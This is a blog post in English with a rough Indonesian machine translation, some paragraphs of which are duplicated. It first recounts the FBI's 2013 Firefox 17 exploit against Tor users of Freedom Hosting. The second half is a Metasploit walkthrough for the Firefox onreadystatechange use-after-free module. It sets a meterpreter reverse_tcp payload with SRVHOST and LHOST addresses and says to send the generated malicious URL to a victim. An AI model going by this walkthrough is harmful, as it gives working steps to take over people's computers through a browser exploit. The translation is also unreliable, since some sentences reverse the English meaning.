The FBI TOR Exploit
Oleh
chmood
SkillsetWhat's this?
Practice for certification success with the Skillset library of over 100,000 practice test questions. We analyze your responses and can determine when you are ready to sit for the test.
SkillsetWhat yang ini?
Praktek untuk sukses sertifikasi dengan perpustakaan skillset lebih dari 100.000 pertanyaan tes praktek. Kami menganalisis tanggapan Anda dan dapat menentukan kapan Anda siap untuk duduk untuk ujian.
The Tor network is an anonymizing network that allows people to browse the web and access other services without being traced. As part of this network, there is the so-called “darknet,” servers accessible only through Tor, which host a variety of services from forums to e-mail.
It does this by directing Internet traffic through a volunteer network of more than 3,000 relays to conceal the user’s location. While many of these services are innocent and aimed at those concerned about human rights abuses, the anonymity naturally attracts those with criminal intent such as the distribution of child pornography. It’s then impossible for law enforcement agencies to trace the original IP address.
The Story Behind FBI and the TOR Exploit
Eric Eoin Marques, a US-born 28-year-old living in Dublin, Ireland, is accused of being the chief architect behind Freedom Hosting, which is responsible for hosting child porn on 550 servers throughout Europe.
Freedom Hosting is a major hidden services hosting provider that can only be accessed through the Tor network.
Freedom Hosting and Marques have been associated with child pornography, so Tor released a statement claiming that they are in no way associated with the people running Freedom Hosting:
“The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of JavaScript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor browser is based. We’re investigating these bugs and will fix them if we can,” Tor said in a statement.
The FBI used a vulnerability in Firefox 17, on which the Tor browser is based, to turn Freedom Hosting sites into malware spreading tracker tools. It all works on the Firefox 17 JavaScript Zero Day Exploit; this malicious script is a tiny Windows executable hidden variable named “Magneto” which looks for victim’s MAC address and its hostname and sends it back as a HTTP web request to the Virginia server to expose the user’s real IP address. The FBI successfully gained access to the Freedom Hosting server and injected malicious HTML code, which checks whether the user’s browser is Firefox 17 or not.
Jaringan Tor adalah sebuah jaringan anonymi yang memungkinkan orang untuk menelusuri web dan akses layanan lainnya tanpa dilacak. Sebagai bagian dari jaringan ini, ada yang disebut "darknet," server hanya dapat diakses melalui Tor, yang tuan rumah berbagai layanan dari forum ke e-mail.
Hal ini dilakukan dengan mengarahkan lalu lintas Internet melalui jaringan relawan lebih dari 3.000 relay untuk menyembunyikan lokasi pengguna. Sementara banyak dari layanan ini tidak bersalah dan ditujukan untuk mereka yang peduli tentang pelanggaran hak asasi manusia, anonimitas secara alami menarik orang-orang dengan maksud kriminal seperti distribusi pornografi anak. Ini kemudian mungkin bagi lembaga penegak hukum untuk melacak alamat IP asli.
Kisah Dibalik FBI dan TOR Eksploitasi
Eric Eoin Marques, AS kelahiran hidup 28 tahun di Dublin, Irlandia, yang dituduh sebagai kepala arsitek di balik Freedom Hosting, yang bertanggung jawab untuk hosting porno anak di 550 server di seluruh Eropa.
Freedom Hosting adalah layanan tersembunyi utama penyedia hosting yang hanya dapat diakses melalui jaringan Tor.
Kebebasan Hosting dan Marques telah dikaitkan dengan pornografi anak, sehingga Tor merilis sebuah pernyataan yang mengklaim bahwa mereka tidak berhubungan dengan orang-orang yang menjalankan kebebasan Hosting:
"Orang, atau orang-orang, yang menjalankan Freedom Hosting yang tidak berafiliasi atau terhubung ke The Tor Project, Inc., organisasi koordinasi pengembangan perangkat lunak Tor dan penelitian. Di masa lalu, organisasi permusuhan melewatkan mencoba masuk layanan tersembunyi Tor dan bukannya menyerang perangkat lunak yang berjalan di server di belakang alamat dot bawang. Eksploitasi untuk PHP, Apache, MySQL, dan perangkat lunak lain yang jauh lebih umum daripada eksploitasi untuk Tor. Kabar saat ini menunjukkan bahwa seseorang telah memanfaatkan software belakang Freedom Hosting. Dari apa yang dikenal sejauh ini, pelanggaran itu digunakan untuk mengkonfigurasi server dengan cara yang itu menyuntikkan semacam JavaScript mengeksploitasi di halaman web dikirim ke pengguna. Ini mengeksploitasi digunakan untuk memuat muatan malware untuk menginfeksi komputer pengguna. Payload malware bisa mencoba untuk mengeksploitasi bug potensial di Firefox 17 ESR, pada browser yang Tor kami didasarkan. Kami sedang menyelidiki bug ini dan akan memperbaikinya jika kita bisa, "kata Tor dalam sebuah pernyataan.
FBI menggunakan kerentanan di Firefox 17, di mana browser Tor didasarkan, untuk mengubah Freedom situs Hosting menjadi malware menyebar alat pelacak. Semuanya bekerja pada Firefox 17 Nol Hari JavaScript Eksploitasi; script berbahaya ini adalah Windows executable disembunyikan variabel kecil bernama "Magneto" yang mencari alamat MAC korban dan nama host dan mengirimkannya kembali sebagai permintaan HTTP web ke server Virginia untuk mengekspos alamat IP asli pengguna. FBI berhasil memperoleh akses ke server Freedom Hosting dan disuntikkan kode HTML berbahaya, yang memeriksa apakah browser pengguna adalah Firefox 17 atau tidak.
Firefox onreadystatechange Event DocumentViewerImpl Use After Free
Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.
This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via an specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.
Tutorial
Launch terminal, run msfconsole, and type in use
windows/browser/mozilla_firefox_onreadystatechange:
Firefox onreadystatechange acara DocumentViewerImpl Gunakan Setelah Gratis
Mozilla Firefox sebelum 22.0, Firefox ESR 17.x sebelum 17.0.7, Thunderbird sebelum 17.0.7, dan Thunderbird ESR 17.x sebelum 17.0.7 tidak benar menangani onreadystatechange peristiwa dalam hubungannya dengan reload halaman, yang memungkinkan penyerang remote untuk menyebabkan penolakan layanan (aplikasi crash) atau mungkin mengeksekusi kode arbitrary melalui situs web dibuat yang memicu upaya untuk mengeksekusi data di lokasi memori belum dipetakan.
Modul ini mengeksploitasi kerentanan ditemukan pada Firefox 17.0.6, khususnya penggunaan setelah bebas dari benda DocumentViewerImpl, dipicu melalui halaman web khusus dibuat menggunakan onreadystatechange peristiwa dan window.stop () API, seperti dieksploitasi di alam liar pada 2013 Agustus pengguna Browser Target Tor.
tutorial
Peluncuran terminal, jalankan msfconsole, dan jenis yang digunakan
windows / browser / mozilla_firefox_onreadystatechange:
Next type in show options to check all the available options for this exploit:
As we can see in the above figure, there are some options for this exploit. Now we can see here that the options that are required are showing “yes .” The first option is SRVHOST, which refers to the server host address; it means we have to set our local machine address here. The second option is SRVPORT; since the server port address is showing 8080, this means that port no.8080 must be enabled to successfully run this module.
Let us set the all required options type in set SRVHOST 192.168.0.3:
Seperti yang kita lihat pada gambar di atas, ada beberapa pilihan untuk mengeksploitasi ini. Sekarang kita bisa lihat di sini bahwa opsi yang diperlukan menunjukkan Opsi pertama adalah SRVHOST, yang mengacu pada alamat server host "ya."; itu berarti kita harus mengatur alamat mesin lokal kami di sini. Pilihan kedua adalah SRVPORT; karena alamat port server menunjukkan 8080, ini berarti bahwa no.8080 pelabuhan harus diaktifkan untuk berhasil menjalankan modul ini.
Mari kita mengatur opsi semua yang diperlukan ketik set SRVHOST 192.168.0.3:
Now we are going to set a payload in this exploit. So type in set PAYLOAD windows/meterpreter/reverse_tcp:
Sekarang kita akan mengatur muatan dalam mengeksploitasi. Jadi ketik set payload windows / meterpreter / reverse_tcp:
Now again type in show options to check all the options for the exploit and whether the payload is set or not. Here we can see that our exploit’s options are set and our payload’s option needs to be set.
Sekarang lagi ketik acara pilihan untuk memeriksa semua opsi untuk mengeksploitasi dan apakah payload diatur atau tidak. Di sini kita dapat melihat bahwa opsi mengeksploitasi ini kami ditetapkan dan pilihan payload kita perlu diatur
So type in set LHOST 192.168.0.103:
Jadi ketik set LHOST 192.168.0.103:
Jadi ketik set LHOST 192.168.0.103:
Now we are ready to run this module; type in run:
Now we can see in the above figure that, after running the run command, a malicious URL http://192.168.0.103:8080/2Hek0bdO is generated in msfconsole. Now what we have to do just pass this URL to the victim.
Sekarang kita bisa melihat pada gambar di atas bahwa, setelah menjalankan perintah run, URL http://192.168.0.103:8080/2Hek0bdO berbahaya yang dihasilkan di msfconsole. Sekarang apa yang harus kita lakukan hanya lulus URL ini untuk korban....
Sekarang kita bisa melihat pada gambar di atas bahwa, setelah menjalankan perintah run, URL http://192.168.0.103:8080/2Hek0bdO berbahaya yang dihasilkan di msfconsole. Sekarang apa yang harus kita lakukan hanya lulus URL ini untuk korban....
If the victim is using the vulnerable version of Mozilla Firefox, we will get this type of screen and the victim is compromised:
Jika korban adalah menggunakan versi rentan Mozilla Firefox, kita akan mendapatkan jenis layar dan korban terganggu:
Jika korban adalah menggunakan versi rentan Mozilla Firefox, kita akan mendapatkan jenis layar dan korban terganggu:
References
Category
Komentar